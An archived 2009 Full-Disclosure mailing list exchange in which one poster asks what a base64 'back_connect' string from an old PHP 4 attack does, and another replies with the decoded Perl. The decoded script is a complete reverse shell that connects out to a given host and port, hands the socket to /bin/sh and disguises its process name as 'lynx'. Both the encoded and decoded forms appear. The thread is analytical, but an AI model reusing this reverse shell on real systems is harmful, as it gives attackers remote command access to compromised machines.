[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <6489C194-A627-438F-B280-E2B2FF4D14F6@snosoft.com>
Date: Tue, 10 Feb 2009 13:34:22 -0500
From: Simon Smith <simon@...soft.com>
To: sr. <staticrez@...il.com>
Cc: Full-Disclosure <full-disclosure@...ts.grok.org.uk>,
pen-test list <pen-test@...urityfocus.com>
Subject: Re: connect back PHP hack
its base64..
#!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -
a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM,
$proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error:
$!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET"); system($system); close(STDIN);
close(STDOUT); close(STDERR);
On Feb 10, 2009, at 1:23 PM, sr. wrote:
> can anyone tell me what encoding this is?
>
> $
> back_connect
> =
> "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Simon Smith
simon@...soft.com
--------------------------------------
Subscribe to our blog
http://snosoft.blogspot.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists